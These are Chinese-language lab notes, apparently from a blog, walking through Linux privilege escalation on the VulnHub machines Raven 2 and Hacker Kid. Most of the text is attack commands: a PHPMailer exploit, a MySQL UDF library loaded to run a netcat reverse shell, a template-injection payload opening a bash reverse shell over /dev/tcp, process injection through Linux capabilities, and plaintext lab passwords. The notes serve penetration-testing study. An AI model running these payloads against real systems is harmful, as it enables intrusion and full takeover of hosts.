一、演示案例-Linux系统提权-Web&用户-数据库类型
复现环境:Raven: 2 ~ VulnHub
1、信息收集
http://192.168.139.155/vendor/
2、Web权限获取
searchsploit phpmailer
find / -name 40969.py
cp /usr/share/exploitdb/exploits/php/webapps/40969.py p.py
python p.py
python -c 'import pty; pty.spawn("/bin/bash")' //起一个交互式终端
3、MYSQL-UDF提权
两种提权方式:1、用梭哈工具(注意外联问题) 2、手工操作(不需要外联)
编译UDF.so
searchsploit udf
cp /usr/share/exploitdb/exploits/linux/local/1518.c . //复制到当前所在文件夹
gcc -g -shared -Wl,-soname,1518.so -o udf.so 1518.c -lc
python -m http.server 8080
下载到目标上
python -c 'import pty; pty.spawn("/bin/bash")'
cd tmp
wget http://192.168.139.141:8080/udf.so
连接进行导出调用
mysql -uroot -pR@v3nSecurity
select version(); //查看mysql版本
select @@basedir; //确认mysql安装位置
show variables like '%basedir%'; //确认mysql安装位置
show variables like '%secure%'; //查看可导出文件位置
show variables like '%plugin%'; //查找插件位置
show variables like '%compile%'; //查看系统版本
use mysql;
// 创建xiaodi表
create table xiaodi(line blob);
// 往xiaodi表中插入二进制的udf.so
insert into xiaodi values(load_file('/tmp/udf.so'));
// 导出udf.so到其他位置
select * from xiaodi into dumpfile '/usr/lib/mysql/plugin/udf.so';
// 创建do_system自定义函数并执行命令
create function do_system returns integer soname 'udf.so';
select do_system('nc 192.168.139.141 6666 -e /bin/bash');
二、演示案例-Linux系统提权-Web&用户-Capability能力
原理参考:Linux提权之:利用capabilities提权 - f_carey - 博客园
1、入门
cp /usr/bin/php /tmp/php
chmod 777 /tmp/php
设置能力:setcap cap_setuid+ep /tmp/php
删除能力:setcap -r /tmp/php
查看单个能力:getcap /usr/bin/php
查看所有能力:getcap -r / 2>/dev/null
Hacker_Kid
WP参考:https://www.jianshu.com/p/60673ac0454f
参考这个地址:https://gtfobins.github.io/
2、vulnhub
复现环境:Hacker kid: 1.0.1 ~ VulnHub
WP参考:Hacker_Kids靶机渗透WP - 简书
saket
Saket!#$%@!!
{% import os %}{{os.system('bash -c "bash -i &> /dev/tcp/192.168.139.141/6688 0>&1"')}}
/sbin/getcap -r / 2>/dev/null //查看所有能力
python -m http.server 8080
wget http://192.168.139.141:8080/inject.py
for i in `ps -ef|grep root|grep -v "grep"|awk '{print $2}'`; do python2.7 inject.py $i; done
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
